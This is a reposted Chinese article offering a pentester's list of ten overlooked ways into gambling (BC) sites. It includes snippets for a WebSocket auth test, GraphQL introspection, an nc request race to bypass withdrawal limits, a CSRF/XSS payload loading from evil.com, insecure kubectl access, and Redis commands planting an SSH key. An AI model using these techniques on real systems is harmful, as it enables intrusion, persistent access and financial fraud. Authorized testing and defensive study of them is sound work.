渗透工程师手册:10个被忽视的BC站点突破口

华盟原创文章投稿奖励计划

在安全攻防领域,BC站点因其特殊业务属性,往往部署了严密的安全防护体系。本文基于合法授权的渗透测试经验,揭示十个常被忽视的攻击面,为安全研究人员提供专业参考。(注:本文所述技术仅限授权测试场景使用)

一、子域名资产管理盲区

  1. 1. C段历史解析残留
    通过DNSDB等历史记录查询工具,常可发现已下线但未注销的子域名解析记录,结合C段扫描可定位测试/备份环境

  2. 2. 泛解析证书泄露
    利用censys.io检索*.domain.com证书,可发现非常规入口点(如:devops.domain.com、kibana.internal.domain.com)

二、API端点安全盲点

  1. 3. WebSocket协议鉴权缺失
    部分实时赔率接口采用WS协议传输,测试时需特别检查:

import websockets
async def test_ws_auth():
    try:
        async with websockets.connect('wss://api.domain.com/live') as ws:
            await ws.send('{"action":"getOdds"}') # 未授权指令测试
            print(await ws.recv())
    except Exception as e:
        print(f"Connection failed: {e}")
  1. 4. GraphQL内省查询暴露
    对/graphql端点执行内省查询,可能获取后台管理接口字段:

query { __schema { types { name fields { name } } } }

三、业务逻辑深层漏洞

  1. 5. 活动提现的并发竞争
    利用HTTP管道化技术构造并发请求,可突破每日提现次数限制:

echo -e "POST /withdraw HTTP/1.1\r\n...\r\n\r\n
POST /withdraw HTTP/1.1\r\n..." | nc target.com 443
  1. 6. 推广系统CSRF链式攻击
    当推广链接存在self-XSS时,组合CSRF可实现自动化"发展下线":

<img src="https://target.com/invite?ref=attacker" 
     onerror="document.write('<iframe src=//evil.com/csrf></iframe>')">

四、基础设施配置缺陷

  1. 7. K8s集群未鉴权访问
    对6443端口执行API探测,可能发现开发环境未配置RBAC:

kubectl --insecure-skip-tls-verify=true --server=https://target.com:6443 get pods
  1. 8. Redis未授权访问组合利用
    当发现6379开放时,可尝试写入SSH公钥:

config set dir /root/.ssh/
config set dbfilename authorized_keys
set x "\n\nssh-rsa AAAAB3NzaC...\n\n"
save

五、隐蔽数据泄露路径

  1. 9. Webpack源码映射反编译
    通过.map文件还原原始代码:

// 访问/main.js.map
// 使用reverse-sourcemap工具还原
npm install reverse-sourcemap -g
reverse-sourcemap --output-dir src main.js.map
  1. 10. 日志文件时序预测
    部分系统采用日期格式命名日志文件:

https://cdn.domain.com/logs/20240815_access.log  # 修改日期遍历下载
本文来源Hack之道,经授权后由华盟君发布,观点不代表华盟网的立场,转载请联系原作者。

发表评论